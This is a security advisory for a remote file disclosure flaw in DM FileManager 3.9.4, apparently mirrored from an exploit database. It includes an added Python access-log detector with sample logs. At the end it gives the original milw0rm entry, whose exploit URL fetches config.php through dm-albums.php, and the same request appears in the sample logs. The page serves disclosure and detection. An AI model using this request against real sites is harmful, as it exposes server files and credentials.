Vendor: DM FileManager
By: Stack
CVSS: 7.5 (HIGH)
Remote File Disclosure
CWE: 434
Product Name: DM FileManager
Affected Version From: 3.9.4
Affected Version To: 3.9.4
Patch Exists: YES
Related CWE: N/A
CPE: a:dutchmonkey:dm_filemanager
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

DM FileManager 3.9.4 Remote File Disclosure Vulnerability

A vulnerability in DM FileManager 3.9.4 allows an attacker to remotely download any file from the server. This is due to the lack of proper validation of the 'file' parameter in the 'dm-albums.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server.

Mitigation:

Upgrade to the latest version of DM FileManager.
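
For hosts that cannot be upgraded immediately, the following detection sketch scans web access logs for 'dm-albums.php' download requests whose 'file' or 'currdir' values look wrong. It is an added example, not part of the original advisory or of DM FileManager's code; the image-only extension list, the /blog/ path and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate album downloads are image files only; adjust to your site.
MEDIA_EXT = (".jpg", ".jpeg", ".png", ".gif")
# Common/combined log format: client address first, request line in quotes.
LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return a reason if the request target misuses the dm-albums.php download, else None."""
    url = urlsplit(target)
    if not url.path.lower().endswith("/dm-albums.php"):
        return None
    qs = parse_qs(url.query, keep_blank_values=True)  # also percent-decodes values
    if "download" not in qs:
        return None
    for value in qs.get("file", []) + qs.get("currdir", []):
        if ".." in value.replace("\\", "/").split("/"):
            return "parent-directory segment in path parameter"
        if "\x00" in value or "%" in value:
            return "NUL byte or residual encoding in path parameter"
    for name in qs.get("file", []):
        if not name.lower().endswith(MEDIA_EXT):
            return "non-media file requested: " + name
    return None

def scan(lines):
    """Return a list of (client, reason) for every suspicious access-log line."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            reason = classify(m.group(2))
            if reason:
                hits.append((m.group(1), reason))
    return hits

# Constructed sample log lines (documentation IP ranges, hypothetical /blog/ path).
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Jun/2009:10:01:02 +0000] "GET /blog/dm-albums/dm-albums.php'
    '?download=yes&file=config.php&currdir=/dm-albums/ HTTP/1.1" 200 812',
    '198.51.100.4 - - [30/Jun/2009:10:02:10 +0000] "GET /blog/dm-albums/dm-albums.php'
    '?download=yes&file=beach.jpg&currdir=/dm-albums/ HTTP/1.1" 200 48211',
    '198.51.100.4 - - [30/Jun/2009:10:02:11 +0000] "GET /blog/index.php HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for client, reason in scan(SAMPLE_LOG):
        print(client, reason)
```

A hit on a response with status 200 means the requested file was likely served, so any credentials it contained should be rotated.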

Exploit-DB raw data:

#############################################################################################
[+] DM FileManager 3.9.4 Remote File Disclosure Vulnerability
[+] Author : Stack
[+] Greetz : V4 Team & Sec R1z
[+] Download Script : http://www.dutchmonkey.com/?file=products/dm-filemanager/download_response.html&download=direct
#############################################################################################
[+] Xpl :
[+] http://[sitename]/[path]/dm-albums/dm-albums.php?download=yes&file=config.php&currdir=/dm-albums/
#############################################################################################

# milw0rm.com [2009-06-30]